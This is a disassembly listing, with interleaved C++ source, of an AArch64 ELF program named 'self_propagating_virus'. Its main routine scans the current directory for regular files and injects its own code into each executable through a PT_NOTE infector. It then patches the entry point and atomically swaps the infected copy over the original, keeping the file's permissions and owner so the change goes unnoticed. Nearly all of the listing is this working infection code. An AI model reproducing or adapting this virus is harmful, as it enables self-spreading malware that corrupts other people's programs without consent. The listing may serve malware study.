
/tmp/bin/virus/self_propagating_virus:     file format elf64-littleaarch64


Disassembly of section .text:

0000000000001000 <__parasite_start>:
.section .text.start_parasite 
.global _start
_start:
    /* .inst 0xd4200000 */
    
stp x0, x1, [sp, #-16]!     /* Push x0 x1 to stack. x0 has atexit function pointer. */
    1000:	a9bf07e0 	stp	x0, x1, [sp, #-16]!

ldr x0, [sp, 16]            /* argc (x0) was in the stack */
    1004:	f9400be0 	ldr	x0, [sp, #16]
add x1, sp, 24              /* argv (x1) = sp */
    1008:	910063e1 	add	x1, sp, #0x18

lsl x2, x0, 3               /* envp (x2) = 8*argc ... */
    100c:	d37df002 	lsl	x2, x0, #3
add x2, x2, 8               /*          + 8 (skip null) */
    1010:	91002042 	add	x2, x2, #0x8
add x2, x2, x1              /*          + argv */
    1014:	8b010042 	add	x2, x2, x1

    /* because we pushed x0 and x1 to stack, the original way of alignment wont
     work anymore. but OS should always give us an aligned sp first.
     and sp, x1, #0xfffffffffffffff0 */

bl main
    1018:	94000022 	bl	10a0 <main>
ldp x0, x1, [sp], #16       /* restore x0 */
    101c:	a8c107e0 	ldp	x0, x1, [sp], #16

0000000000001020 <_patch_return>:
    1020:	11223344 	add	w4, w26, #0x88c

0000000000001024 <vt::infector::atomic_swap_host(int, char const*, int, char const*)>:

  return output;
}

bool atomic_swap_host(int host_fd, const char* host, int tmp_fd,
                      const char* tmp) {
    1024:	d10283ff 	sub	sp, sp, #0xa0
    1028:	a90857fe 	stp	x30, x21, [sp, #128]
    102c:	a9094ff4 	stp	x20, x19, [sp, #144]
    1030:	aa0103f4 	mov	x20, x1
  // mimic the original file.
  struct stat s;
  if (vt::fstat(host_fd, &s) < 0) {
    1034:	910003e1 	mov	x1, sp
    1038:	aa0303f3 	mov	x19, x3
    103c:	2a0203f5 	mov	w21, w2
    1040:	940002f5 	bl	1c14 <vt::fstat(int, stat*)>
    1044:	37f801e0 	tbnz	w0, #31, 1080 <vt::infector::atomic_swap_host(int, char const*, int, char const*)+0x5c>
    return false;
  }
  if (vt::fchmod(tmp_fd, s.st_mode) < 0) {
    1048:	b94013e1 	ldr	w1, [sp, #16]
    104c:	2a1503e0 	mov	w0, w21
    1050:	940002ec 	bl	1c00 <vt::fchmod(int, unsigned int)>
    1054:	37f80160 	tbnz	w0, #31, 1080 <vt::infector::atomic_swap_host(int, char const*, int, char const*)+0x5c>
    return false;
  }
  if (vt::fchown(tmp_fd, s.st_uid, s.st_gid) < 0) {
    1058:	29430be1 	ldp	w1, w2, [sp, #24]
    105c:	2a1503e0 	mov	w0, w21
    1060:	9400034e 	bl	1d98 <vt::fchown(int, unsigned int, unsigned int)>
    1064:	37f800e0 	tbnz	w0, #31, 1080 <vt::infector::atomic_swap_host(int, char const*, int, char const*)+0x5c>
    return false;
  }
  // atomic swap and replace the orignal host with our infected one.
  if (vt::rename(tmp, host) < 0) {
    1068:	aa1303e0 	mov	x0, x19
    106c:	aa1403e1 	mov	x1, x20
    1070:	9400030c 	bl	1ca0 <vt::rename(char const*, char const*)>
    1074:	2a2003e8 	mvn	w8, w0
    1078:	531f7d00 	lsr	w0, w8, #31
    107c:	14000002 	b	1084 <vt::infector::atomic_swap_host(int, char const*, int, char const*)+0x60>
    1080:	2a1f03e0 	mov	w0, wzr
    return false;
  }
  return true;
}
    1084:	a9494ff4 	ldp	x20, x19, [sp, #144]
    1088:	a94857fe 	ldp	x30, x21, [sp, #128]
    108c:	910283ff 	add	sp, sp, #0xa0
    1090:	d65f03c0 	ret
	...

00000000000010a0 <main>:
#include "nostdlib/stdlib.hh"
#include "nostdlib/string.hh"
#include "nostdlib/unistd.hh"
#include "redirection/entry_point.hh"

int main(int argc, char* argv[], char* env[]) {
    10a0:	a9ba7bfd 	stp	x29, x30, [sp, #-96]!
    10a4:	a9016ffc 	stp	x28, x27, [sp, #16]
    10a8:	a90267fa 	stp	x26, x25, [sp, #32]
    10ac:	a9035ff8 	stp	x24, x23, [sp, #48]
    10b0:	a90457f6 	stp	x22, x21, [sp, #64]
    10b4:	a9054ff4 	stp	x20, x19, [sp, #80]
    10b8:	d1400bff 	sub	sp, sp, #0x2, lsl #12
    10bc:	d10203ff 	sub	sp, sp, #0x80
    10c0:	aa0103f3 	mov	x19, x1
  const char* quote1 = STR_LITERAL(
    10c4:	10000054 	adr	x20, 10cc <main+0x2c>
    10c8:	14000022 	b	1150 <main+0xb0>
    10cc:	64206649 	.word	0x64206649
    10d0:	67756265 	.word	0x67756265
    10d4:	676e6967 	.word	0x676e6967
    10d8:	20736920 	.word	0x20736920
    10dc:	20656874 	.word	0x20656874
    10e0:	636f7270 	.word	0x636f7270
    10e4:	20737365 	.word	0x20737365
    10e8:	7220666f 	.word	0x7220666f
    10ec:	766f6d65 	.word	0x766f6d65
    10f0:	20676e69 	.word	0x20676e69
    10f4:	74666f73 	.word	0x74666f73
    10f8:	65726177 	.word	0x65726177
    10fc:	67756220 	.word	0x67756220
    1100:	74202c73 	.word	0x74202c73
    1104:	206e6568 	.word	0x206e6568
    1108:	676f7270 	.word	0x676f7270
    110c:	6d6d6172 	.word	0x6d6d6172
    1110:	20676e69 	.word	0x20676e69
    1114:	7473756d 	.word	0x7473756d
    1118:	20656220 	.word	0x20656220
    111c:	6874      	.short	0x6874
    111e:	65          	.byte	0x65
    111f:	20          	.byte	0x20
    1120:	636f7270 	.word	0x636f7270
    1124:	20737365 	.word	0x20737365
    1128:	7020666f 	.word	0x7020666f
    112c:	69747475 	.word	0x69747475
    1130:	7420676e 	.word	0x7420676e
    1134:	206d6568 	.word	0x206d6568
    1138:	202e6e69 	.word	0x202e6e69
    113c:	6445202d 	.word	0x6445202d
    1140:	72656773 	.word	0x72656773
    1144:	6a694420 	.word	0x6a694420
    1148:	7274736b 	.word	0x7274736b
    114c:	00000a61 	.word	0x00000a61
      "If debugging is the process of removing software bugs, then programming "
      "must be the process of putting them in. - Edsger Dijkstra\n");
  const char* quote2 = STR_LITERAL(
    1150:	10000055 	adr	x21, 1158 <main+0xb8>
    1154:	1400002b 	b	1200 <main+0x160>
    1158:	63206649 	.word	0x63206649
    115c:	65707261 	.word	0x65707261
    1160:	7265746e 	.word	0x7265746e
    1164:	616d2073 	.word	0x616d2073
    1168:	62206564 	.word	0x62206564
    116c:	646c6975 	.word	0x646c6975
    1170:	73676e69 	.word	0x73676e69
    1174:	65687420 	.word	0x65687420
    1178:	79617720 	.word	0x79617720
    117c:	6f727020 	.word	0x6f727020
    1180:	6d617267 	.word	0x6d617267
    1184:	7372656d 	.word	0x7372656d
    1188:	6b616d20 	.word	0x6b616d20
    118c:	72702065 	.word	0x72702065
    1190:	6172676f 	.word	0x6172676f
    1194:	202c736d 	.word	0x202c736d
    1198:	20656874 	.word	0x20656874
    119c:	73726966 	.word	0x73726966
    11a0:	6f772074 	.word	0x6f772074
    11a4:	6570646f 	.word	0x6570646f
    11a8:	72656b63 	.word	0x72656b63
    11ac:	206f7420 	.word	0x206f7420
    11b0:	656d6f63 	.word	0x656d6f63
    11b4:	6f6c6120 	.word	0x6f6c6120
    11b8:	7720676e 	.word	0x7720676e
    11bc:	646c756f 	.word	0x646c756f
    11c0:	73656420 	.word	0x73656420
    11c4:	796f7274 	.word	0x796f7274
    11c8:	6c6c6120 	.word	0x6c6c6120
    11cc:	20666f20 	.word	0x20666f20
    11d0:	69766963 	.word	0x69766963
    11d4:	617a696c 	.word	0x617a696c
    11d8:	6e6f6974 	.word	0x6e6f6974
    11dc:	202d202e 	.word	0x202d202e
    11e0:	6e6b6e55 	.word	0x6e6b6e55
    11e4:	206e776f 	.word	0x206e776f
    11e8:	676f7270 	.word	0x676f7270
    11ec:	6d6d6172 	.word	0x6d6d6172
    11f0:	000a7265 	.word	0x000a7265
    11f4:	d503201f 	.word	0xd503201f
    11f8:	d503201f 	.word	0xd503201f
    11fc:	d503201f 	.word	0xd503201f
      "If carpenters made buildings the way programmers make programs, the "
      "first woodpecker to come along would destroy all of civilization. - "
      "Unknown programmer\n");

  auto addr =
      reinterpret_cast<uintptr_t>(vt::common::get_parasite_start_address());
    1200:	940001a7 	bl	189c <vt::common::get_parasite_start_address()>
  const char* str = (addr & 0x100000) ? quote1 : quote2;
    1204:	f26c001f 	tst	x0, #0x100000
    1208:	9a9402b4 	csel	x20, x21, x20, eq  // eq = none

  vt::write(1, str, vt::strlen(str));
    120c:	aa1403e0 	mov	x0, x20
    1210:	940002d6 	bl	1d68 <vt::strlen(char const*)>
    1214:	aa0003e2 	mov	x2, x0
    1218:	52800020 	mov	w0, #0x1                   	// #1
    121c:	aa1403e1 	mov	x1, x20
    1220:	940002fa 	bl	1e08 <vt::write(int, void const*, unsigned long)>
class FileDescriptor {
 public:
  FileDescriptor() = default;
  FileDescriptor(const char* path, int flags, int mode)
      : flags_(flags), mode_(mode) {
    fd_ = vt::open(path, flags_, mode_);
    1224:	91400be0 	add	x0, sp, #0x2, lsl #12
    1228:	528005c8 	mov	w8, #0x2e                  	// #46

  char dir[] = {'.', 0};
    122c:	9101fbe9 	add	x9, sp, #0x7e
    1230:	9101f000 	add	x0, x0, #0x7c
    1234:	2a1f03e1 	mov	w1, wzr
    1238:	2a1f03e2 	mov	w2, wzr
      : flags_(flags), mode_(mode) {
    123c:	f9103bff 	str	xzr, [sp, #8304]
    1240:	793ffd28 	strh	w8, [x9, #8190]
    fd_ = vt::open(path, flags_, mode_);
    1244:	94000266 	bl	1bdc <vt::open(char const*, int, unsigned int)>
    1248:	2a0003e1 	mov	w1, w0
    if (fd_ == -1) {
    124c:	3100041f 	cmn	w0, #0x1
    fd_ = vt::open(path, flags_, mode_);
    1250:	b9207be1 	str	w1, [sp, #8312]
    if (fd_ == -1) {
    1254:	54000d20 	b.eq	13f8 <main+0x358>  // b.none
    Entry cur_{};
  };

  DirectoryIterator(const char* path) : directory_fd_(path, O_RDONLY, 0) {}

  Iterator begin() { return Iterator{directory_fd_.handle()}; }
    1258:	914007e0 	add	x0, sp, #0x1, lsl #12
    125c:	914007f5 	add	x21, sp, #0x1, lsl #12
    1260:	91014000 	add	x0, x0, #0x50
    1264:	910142b5 	add	x21, x21, #0x50
    1268:	94000124 	bl	16f8 <vt::common::DirectoryIterator::Iterator::Iterator(int)>
      return cur_.name == other.cur_.name;
    126c:	f95037f4 	ldr	x20, [sp, #8296]

  for (auto it : vt::common::DirectoryIterator(dir)) {
    1270:	b4000ab4 	cbz	x20, 13c4 <main+0x324>
    1274:	52820208 	mov	w8, #0x1010                	// #4112
    1278:	1280001a 	mov	w26, #0xffffffff            	// #-1
    127c:	8b0802bb 	add	x27, x21, x8
    1280:	910083fc 	add	x28, sp, #0x20
    1284:	528005dd 	mov	w29, #0x2e                  	// #46
    1288:	39400368 	ldrb	w8, [x27]
    if (it.type == vt::common::DirectoryIterator::EntryType::FILE) {
    128c:	7100051f 	cmp	w8, #0x1
    1290:	54000901 	b.ne	13b0 <main+0x310>  // b.any
      CHECK_FAIL();
    }
  }

  FileDescriptor(const char* path, int flags) : flags_(flags) {
    fd_ = vt::open(path, flags_, 0);
    1294:	aa1403e0 	mov	x0, x20
    1298:	2a1f03e1 	mov	w1, wzr
    129c:	2a1f03e2 	mov	w2, wzr
  FileDescriptor(const char* path, int flags) : flags_(flags) {
    12a0:	f90823ff 	str	xzr, [sp, #4160]
 private:
  MAKE_NON_COPYABLE(FileDescriptor);

  int flags_ = 0;
  int mode_ = 0;
  int fd_ = -1;
    12a4:	b9104bfa 	str	w26, [sp, #4168]
    fd_ = vt::open(path, flags_, 0);
    12a8:	9400024d 	bl	1bdc <vt::open(char const*, int, unsigned int)>
    if (fd_ == -1) {
    12ac:	3100041f 	cmn	w0, #0x1
    fd_ = vt::open(path, flags_, 0);
    12b0:	b9104be0 	str	w0, [sp, #4168]
    if (fd_ == -1) {
    12b4:	54000a20 	b.eq	13f8 <main+0x358>  // b.none
      auto host = vt::common::FileDescriptor(host_path, O_RDONLY);
      if (!host.valid()) {
        continue;
      }

      auto host_size = host.file_size();
    12b8:	914007e0 	add	x0, sp, #0x1, lsl #12
    12bc:	91010000 	add	x0, x0, #0x40
    12c0:	9400004f 	bl	13fc <vt::common::FileDescriptor::file_size() const>
      if (host_size == 0 ||
    12c4:	b4000700 	cbz	x0, 13a4 <main+0x304>
          !vt::strcmp(host_path,
                      argv[0] + vt::strlen(argv[0]) - vt::strlen(host_path))) {
    12c8:	f9400276 	ldr	x22, [x19]
    12cc:	aa0003f5 	mov	x21, x0
    12d0:	aa1603e0 	mov	x0, x22
    12d4:	940002a5 	bl	1d68 <vt::strlen(char const*)>
    12d8:	8b0002d6 	add	x22, x22, x0
    12dc:	aa1403e0 	mov	x0, x20
    12e0:	940002a2 	bl	1d68 <vt::strlen(char const*)>
    12e4:	cb0002c1 	sub	x1, x22, x0
          !vt::strcmp(host_path,
    12e8:	aa1403e0 	mov	x0, x20
    12ec:	94000292 	bl	1d34 <vt::strcmp(char const*, char const*)>
      if (host_size == 0 ||
    12f0:	340005a0 	cbz	w0, 13a4 <main+0x304>
        continue;
      }

      vt::common::Mmap<PROT_READ> host_mapping(host_size, MAP_PRIVATE,
    12f4:	914007e0 	add	x0, sp, #0x1, lsl #12
  int handle() const { return fd_; }
    12f8:	b9504be3 	ldr	w3, [sp, #4168]
    12fc:	91008000 	add	x0, x0, #0x20
    1300:	aa1503e1 	mov	x1, x21
    1304:	52800042 	mov	w2, #0x2                   	// #2
    1308:	aa1f03e4 	mov	x4, xzr
    130c:	9400004f 	bl	1448 <vt::common::Mmap<1>::Mmap(unsigned long, int, int, unsigned long)>
                                               host.handle(), 0);
      std::span<const std::byte> parasite(
          vt::common::get_parasite_start_address(),
    1310:	94000163 	bl	189c <vt::common::get_parasite_start_address()>
    1314:	aa0003f5 	mov	x21, x0
          vt::common::get_parasite_len());
    1318:	94000164 	bl	18a8 <vt::common::get_parasite_len()>
    131c:	aa0003f6 	mov	x22, x0
      std::span<const std::byte> host_span(host_mapping.base(),
                                           host_mapping.size());

      char tmp[PATH_MAX];
      auto len = vt::strlen(host_path);
    1320:	aa1403e0 	mov	x0, x20
    std::swap(offset_, other.offset_);
    std::swap(base_, other.base_);
    return *this;
  }

  const std::byte* base() const { return base_; }
    1324:	f9481ff7 	ldr	x23, [sp, #4152]
    return base_;
  }

  bool valid() const { return base() != nullptr; }

  size_t size() const { return size_; }
    1328:	f94813f8 	ldr	x24, [sp, #4128]
    132c:	9400028f 	bl	1d68 <vt::strlen(char const*)>
    1330:	aa0003f9 	mov	x25, x0
      vt::strcpy(tmp, host_path);
    1334:	910083e0 	add	x0, sp, #0x20
    1338:	aa1403e1 	mov	x1, x20
    133c:	94000285 	bl	1d50 <vt::strcpy(char*, char const*)>
      tmp[len] = '.';
    1340:	78396b9d 	strh	w29, [x28, x25]
      tmp[len + 1] = '\0';

      auto new_host = vt::infector::infect<vt::infector::PtNoteInfector,
                                           vt::redirection::EntryPointPatcher>(
          host_span, parasite, tmp,
          vt::common::get_patch_return_offset_from_parasite_start());
    1344:	9400015f 	bl	18c0 <vt::common::get_patch_return_offset_from_parasite_start()>
    1348:	aa0003e5 	mov	x5, x0
      auto new_host = vt::infector::infect<vt::infector::PtNoteInfector,
    134c:	910043e8 	add	x8, sp, #0x10
    1350:	910083e4 	add	x4, sp, #0x20
    1354:	aa1703e0 	mov	x0, x23
    1358:	aa1803e1 	mov	x1, x24
    135c:	aa1503e2 	mov	x2, x21
    1360:	aa1603e3 	mov	x3, x22
    1364:	9400004b 	bl	1490 <vt::common::FileDescriptor vt::infector::infect<vt::infector::PtNoteInfector, vt::redirection::EntryPointPatcher>(std::__1::span<std::byte const, 18446744073709551615ul>, std::__1::span<std::byte const, 18446744073709551615ul>, char const*, unsigned long)>
  bool valid() const { return fd_ != -1; }
    1368:	b9401be2 	ldr	w2, [sp, #24]
      if (!new_host.valid()) {
    136c:	3100045f 	cmn	w2, #0x1
    1370:	54000100 	b.eq	1390 <main+0x2f0>  // b.none
  int handle() const { return fd_; }
    1374:	b9504be0 	ldr	w0, [sp, #4168]
        continue;
      }

      if (!vt::infector::atomic_swap_host(host.handle(), host_path,
    1378:	910083e3 	add	x3, sp, #0x20
    137c:	aa1403e1 	mov	x1, x20
    1380:	97ffff29 	bl	1024 <vt::infector::atomic_swap_host(int, char const*, int, char const*)>
    1384:	37000060 	tbnz	w0, #0, 1390 <main+0x2f0>
                                          new_host.handle(), tmp)) {
        (void)vt::unlink(tmp);
    1388:	910083e0 	add	x0, sp, #0x20
    138c:	94000299 	bl	1df0 <vt::unlink(char const*)>
      }
    }
    1390:	910043e0 	add	x0, sp, #0x10
    1394:	94000098 	bl	15f4 <vt::common::FileDescriptor::~FileDescriptor()>
    1398:	914007e0 	add	x0, sp, #0x1, lsl #12
    139c:	91008000 	add	x0, x0, #0x20
    13a0:	9400009f 	bl	161c <vt::common::Mmap<1>::~Mmap()>
    13a4:	914007e0 	add	x0, sp, #0x1, lsl #12
    13a8:	91010000 	add	x0, x0, #0x40
    13ac:	94000092 	bl	15f4 <vt::common::FileDescriptor::~FileDescriptor()>
  for (auto it : vt::common::DirectoryIterator(dir)) {
    13b0:	914007e0 	add	x0, sp, #0x1, lsl #12
    13b4:	91014000 	add	x0, x0, #0x50
    13b8:	940000fd 	bl	17ac <vt::common::DirectoryIterator::Iterator::operator++()>
    13bc:	f95037f4 	ldr	x20, [sp, #8296]
    13c0:	b5fff654 	cbnz	x20, 1288 <main+0x1e8>
class DirectoryIterator {
    13c4:	91400be0 	add	x0, sp, #0x2, lsl #12
    13c8:	9101c000 	add	x0, x0, #0x70
    13cc:	9400008a 	bl	15f4 <vt::common::FileDescriptor::~FileDescriptor()>
  }
  return 0;
    13d0:	2a1f03e0 	mov	w0, wzr
    13d4:	91400bff 	add	sp, sp, #0x2, lsl #12
    13d8:	910203ff 	add	sp, sp, #0x80
    13dc:	a9454ff4 	ldp	x20, x19, [sp, #80]
    13e0:	a94457f6 	ldp	x22, x21, [sp, #64]
    13e4:	a9435ff8 	ldp	x24, x23, [sp, #48]
    13e8:	a94267fa 	ldp	x26, x25, [sp, #32]
    13ec:	a9416ffc 	ldp	x28, x27, [sp, #16]
    13f0:	a8c67bfd 	ldp	x29, x30, [sp], #96
    13f4:	d65f03c0 	ret
    13f8:	94000272 	bl	1dc0 <vt::exit(int)>

00000000000013fc <vt::common::FileDescriptor::file_size() const>:
  size_t file_size() const {
    13fc:	d10243ff 	sub	sp, sp, #0x90
    1400:	f90043fe 	str	x30, [sp, #128]
    CHECK_NE(fd_, -1);
    1404:	b9400800 	ldr	w0, [x0, #8]
    1408:	3100041f 	cmn	w0, #0x1
    140c:	540001c0 	b.eq	1444 <vt::common::FileDescriptor::file_size() const+0x48>  // b.none
    struct stat s {};
    1410:	6f00e400 	movi	v0.2d, #0x0
    auto ret = vt::fstat(fd_, &s);
    1414:	910003e1 	mov	x1, sp
    struct stat s {};
    1418:	ad0003e0 	stp	q0, q0, [sp]
    141c:	ad0103e0 	stp	q0, q0, [sp, #32]
    1420:	ad0203e0 	stp	q0, q0, [sp, #64]
    1424:	ad0303e0 	stp	q0, q0, [sp, #96]
    auto ret = vt::fstat(fd_, &s);
    1428:	940001fb 	bl	1c14 <vt::fstat(int, stat*)>
    CHECK_NE(ret, -1);
    142c:	3100041f 	cmn	w0, #0x1
    1430:	540000a0 	b.eq	1444 <vt::common::FileDescriptor::file_size() const+0x48>  // b.none
    return s.st_size;
    1434:	f9401be0 	ldr	x0, [sp, #48]
    1438:	f94043fe 	ldr	x30, [sp, #128]
    143c:	910243ff 	add	sp, sp, #0x90
    1440:	d65f03c0 	ret
    1444:	9400025f 	bl	1dc0 <vt::exit(int)>

0000000000001448 <vt::common::Mmap<1>::Mmap(unsigned long, int, int, unsigned long)>:
      : size_(size), flags_(flags), offset_(offset) {
    1448:	a9bf4ffe 	stp	x30, x19, [sp, #-16]!
    144c:	aa0403e5 	mov	x5, x4
    1450:	2a0303e4 	mov	w4, w3
    1454:	2a0203e3 	mov	w3, w2
    1458:	aa0003f3 	mov	x19, x0
    145c:	f9000001 	str	x1, [x0]
    1460:	b9000802 	str	w2, [x0, #8]
    auto ret = vt::mmap(nullptr, size, PROT, flags, fd, offset);
    1464:	52800022 	mov	w2, #0x1                   	// #1
      : size_(size), flags_(flags), offset_(offset) {
    1468:	a9017c05 	stp	x5, xzr, [x0, #16]
    auto ret = vt::mmap(nullptr, size, PROT, flags, fd, offset);
    146c:	aa1f03e0 	mov	x0, xzr
    1470:	94000213 	bl	1cbc <vt::mmap(void*, unsigned long, int, int, int, long)>
    if (ret == MAP_FAILED) {
    1474:	b100041f 	cmn	x0, #0x1
    1478:	54000080 	b.eq	1488 <vt::common::Mmap<1>::Mmap(unsigned long, int, int, unsigned long)+0x40>  // b.none
      base_ = static_cast<std::byte*>(ret);
    147c:	f9000e60 	str	x0, [x19, #24]
  }
    1480:	a8c14ffe 	ldp	x30, x19, [sp], #16
    1484:	d65f03c0 	ret
      CHECK_FAIL();
    1488:	12800000 	mov	w0, #0xffffffff            	// #-1
    148c:	9400024d 	bl	1dc0 <vt::exit(int)>

0000000000001490 <vt::common::FileDescriptor vt::infector::infect<vt::infector::PtNoteInfector, vt::redirection::EntryPointPatcher>(std::__1::span<std::byte const, 18446744073709551615ul>, std::__1::span<std::byte const, 18446744073709551615ul>, char const*, unsigned long)>:
                              size_t parasite_patch_offset) {
    1490:	d10383ff 	sub	sp, sp, #0xe0
    1494:	f9004bfe 	str	x30, [sp, #144]
    1498:	a90a67fa 	stp	x26, x25, [sp, #160]
    149c:	a90b5ff8 	stp	x24, x23, [sp, #176]
    14a0:	a90c57f6 	stp	x22, x21, [sp, #192]
    14a4:	a90d4ff4 	stp	x20, x19, [sp, #208]
    14a8:	aa0303f6 	mov	x22, x3
    14ac:	aa0203f7 	mov	x23, x2
    14b0:	aa0103f8 	mov	x24, x1
    14b4:	aa0003f9 	mov	x25, x0
  std::optional<InjectionResult> inject(
      std::span<std::byte> host_mapping,
      std::span<const std::byte> parasite_mapping);

 private:
  size_t host_size_{};
    14b8:	6f00e400 	movi	v0.2d, #0x0
    14bc:	aa0403f3 	mov	x19, x4
  if (!infector.analyze(host_mapping, parasite_mapping)) {
    14c0:	910143e0 	add	x0, sp, #0x50
    14c4:	aa1903e1 	mov	x1, x25
    14c8:	aa1803e2 	mov	x2, x24
    14cc:	aa1703e3 	mov	x3, x23
    14d0:	aa1603e4 	mov	x4, x22
    14d4:	aa0503f5 	mov	x21, x5
    14d8:	aa0803f4 	mov	x20, x8
    14dc:	ad0283e0 	stp	q0, q0, [sp, #80]
  size_t parasite_size_{};
  Elf64_Addr original_e_entry_{};
  Elf64_Off original_pt_note_file_offset_{};
  Elf64_Off virus_offset_{};
    14e0:	ad0383e0 	stp	q0, q0, [sp, #112]
    14e4:	940000ff 	bl	18e0 <vt::infector::PtNoteInfector::analyze(std::__1::span<std::byte const, 18446744073709551615ul>, std::__1::span<std::byte const, 18446744073709551615ul>)>
    14e8:	36000720 	tbz	w0, #0, 15cc <vt::common::FileDescriptor vt::infector::infect<vt::infector::PtNoteInfector, vt::redirection::EntryPointPatcher>(std::__1::span<std::byte const, 18446744073709551615ul>, std::__1::span<std::byte const, 18446744073709551615ul>, char const*, unsigned long)+0x13c>
  common::FileDescriptor output(tmp_file_name, O_RDWR | O_CREAT, S_IRWXU);
    14ec:	aa1403e0 	mov	x0, x20
    14f0:	aa1303e1 	mov	x1, x19
    14f4:	52800842 	mov	w2, #0x42                  	// #66
    14f8:	52803803 	mov	w3, #0x1c0                 	// #448
    14fc:	94000053 	bl	1648 <vt::common::FileDescriptor::FileDescriptor(char const*, int, int)>
  bool valid() const { return fd_ != -1; }
    1500:	b9400a88 	ldr	w8, [x20, #8]
  if (!output.valid()) {
    1504:	3100051f 	cmn	w8, #0x1
    1508:	54000680 	b.eq	15d8 <vt::common::FileDescriptor vt::infector::infect<vt::infector::PtNoteInfector, vt::redirection::EntryPointPatcher>(std::__1::span<std::byte const, 18446744073709551615ul>, std::__1::span<std::byte const, 18446744073709551615ul>, char const*, unsigned long)+0x148>  // b.none
  auto infected_host_size = infector.injected_host_size();
    150c:	910143e0 	add	x0, sp, #0x50
    1510:	940001af 	bl	1bcc <vt::infector::PtNoteInfector::injected_host_size()>
    1514:	aa0003fa 	mov	x26, x0
  int handle() const { return fd_; }
    1518:	b9400a80 	ldr	w0, [x20, #8]
  vt::ftruncate(output.handle(), infected_host_size);
    151c:	aa1a03e1 	mov	x1, x26
    1520:	94000230 	bl	1de0 <vt::ftruncate(int, long)>
    1524:	b9400a83 	ldr	w3, [x20, #8]
  common::Mmap<PROT_READ | PROT_WRITE> output_host_mapping(
    1528:	9100c3e0 	add	x0, sp, #0x30
    152c:	aa1a03e1 	mov	x1, x26
    1530:	52800022 	mov	w2, #0x1                   	// #1
    1534:	aa1f03e4 	mov	x4, xzr
    1538:	94000053 	bl	1684 <vt::common::Mmap<3>::Mmap(unsigned long, int, int, unsigned long)>
    return base_;
    153c:	f94027e0 	ldr	x0, [sp, #72]
  vt::memcpy(output_host_mapping.mutable_base(), &host_mapping.front(),
    1540:	aa1903e1 	mov	x1, x25
    1544:	aa1803e2 	mov	x2, x24
    1548:	940001e8 	bl	1ce8 <vt::memcpy(void*, void const*, unsigned long)>
    154c:	f94027f8 	ldr	x24, [sp, #72]
  auto result = infector.inject(output_victim, parasite_mapping);
    1550:	910063e8 	add	x8, sp, #0x18
  size_t size() const { return size_; }
    1554:	f9401bf9 	ldr	x25, [sp, #48]
    1558:	910143e0 	add	x0, sp, #0x50
    155c:	aa1703e3 	mov	x3, x23
    1560:	aa1603e4 	mov	x4, x22
    1564:	aa1803e1 	mov	x1, x24
    1568:	aa1903e2 	mov	x2, x25
    156c:	94000152 	bl	1ab4 <vt::infector::PtNoteInfector::inject(std::__1::span<std::byte, 18446744073709551615ul>, std::__1::span<std::byte const, 18446744073709551615ul>)>
    1570:	3940a3e8 	ldrb	w8, [sp, #40]
  if (!result ||
    1574:	34000108 	cbz	w8, 1594 <vt::common::FileDescriptor vt::infector::infect<vt::infector::PtNoteInfector, vt::redirection::EntryPointPatcher>(std::__1::span<std::byte const, 18446744073709551615ul>, std::__1::span<std::byte const, 18446744073709551615ul>, char const*, unsigned long)+0x104>
      !Patch{}(result->parasite_entry_address, result->parasite_file_offset,
    1578:	a9418be1 	ldp	x1, x2, [sp, #24]
    157c:	910023e0 	add	x0, sp, #0x8
    1580:	aa1503e3 	mov	x3, x21
    1584:	aa1803e4 	mov	x4, x24
    1588:	aa1903e5 	mov	x5, x25
    158c:	940001b8 	bl	1c6c <vt::redirection::EntryPointPatcher::operator()(unsigned long, unsigned long, unsigned long, std::__1::span<std::byte, 18446744073709551615ul>)>
  if (!result ||
    1590:	37000180 	tbnz	w0, #0, 15c0 <vt::common::FileDescriptor vt::infector::infect<vt::infector::PtNoteInfector, vt::redirection::EntryPointPatcher>(std::__1::span<std::byte const, 18446744073709551615ul>, std::__1::span<std::byte const, 18446744073709551615ul>, char const*, unsigned long)+0x130>
    1594:	b9400288 	ldr	w8, [x20]
    1598:	12800009 	mov	w9, #0xffffffff            	// #-1
    159c:	b9400a8a 	ldr	w10, [x20, #8]
    output = {};
    15a0:	910023e0 	add	x0, sp, #0x8
    15a4:	b900029f 	str	wzr, [x20]
  int flags_ = 0;
    15a8:	29017fe8 	stp	w8, wzr, [sp, #8]
    15ac:	b9000a89 	str	w9, [x20, #8]
    15b0:	b90013ea 	str	w10, [sp, #16]
    15b4:	94000010 	bl	15f4 <vt::common::FileDescriptor::~FileDescriptor()>
    (void)vt::unlink(tmp_file_name);
    15b8:	aa1303e0 	mov	x0, x19
    15bc:	9400020d 	bl	1df0 <vt::unlink(char const*)>
}
    15c0:	9100c3e0 	add	x0, sp, #0x30
    15c4:	94000042 	bl	16cc <vt::common::Mmap<3>::~Mmap()>
    15c8:	14000004 	b	15d8 <vt::common::FileDescriptor vt::infector::infect<vt::infector::PtNoteInfector, vt::redirection::EntryPointPatcher>(std::__1::span<std::byte const, 18446744073709551615ul>, std::__1::span<std::byte const, 18446744073709551615ul>, char const*, unsigned long)+0x148>
    15cc:	12800008 	mov	w8, #0xffffffff            	// #-1
    15d0:	f900029f 	str	xzr, [x20]
  int fd_ = -1;
    15d4:	b9000a88 	str	w8, [x20, #8]
    15d8:	a94d4ff4 	ldp	x20, x19, [sp, #208]
    15dc:	a94c57f6 	ldp	x22, x21, [sp, #192]
    15e0:	a94b5ff8 	ldp	x24, x23, [sp, #176]
    15e4:	a94a67fa 	ldp	x26, x25, [sp, #160]
    15e8:	f9404bfe 	ldr	x30, [sp, #144]
    15ec:	910383ff 	add	sp, sp, #0xe0
    15f0:	d65f03c0 	ret

00000000000015f4 <vt::common::FileDescriptor::~FileDescriptor()>:
  ~FileDescriptor() {
    15f4:	f81f0ffe 	str	x30, [sp, #-16]!
    if (fd_ != -1) {
    15f8:	b9400800 	ldr	w0, [x0, #8]
    15fc:	3100041f 	cmn	w0, #0x1
    1600:	54000080 	b.eq	1610 <vt::common::FileDescriptor::~FileDescriptor()+0x1c>  // b.none
      if (vt::close(fd_) == -1) {
    1604:	940001eb 	bl	1db0 <vt::close(int)>
    1608:	3100041f 	cmn	w0, #0x1
    160c:	54000060 	b.eq	1618 <vt::common::FileDescriptor::~FileDescriptor()+0x24>  // b.none
  }
    1610:	f84107fe 	ldr	x30, [sp], #16
    1614:	d65f03c0 	ret
        CHECK_FAIL();
    1618:	940001ea 	bl	1dc0 <vt::exit(int)>

000000000000161c <vt::common::Mmap<1>::~Mmap()>:
  ~Mmap() {
    161c:	f81f0ffe 	str	x30, [sp, #-16]!
    1620:	aa0003e8 	mov	x8, x0
    if (base_ != nullptr) {
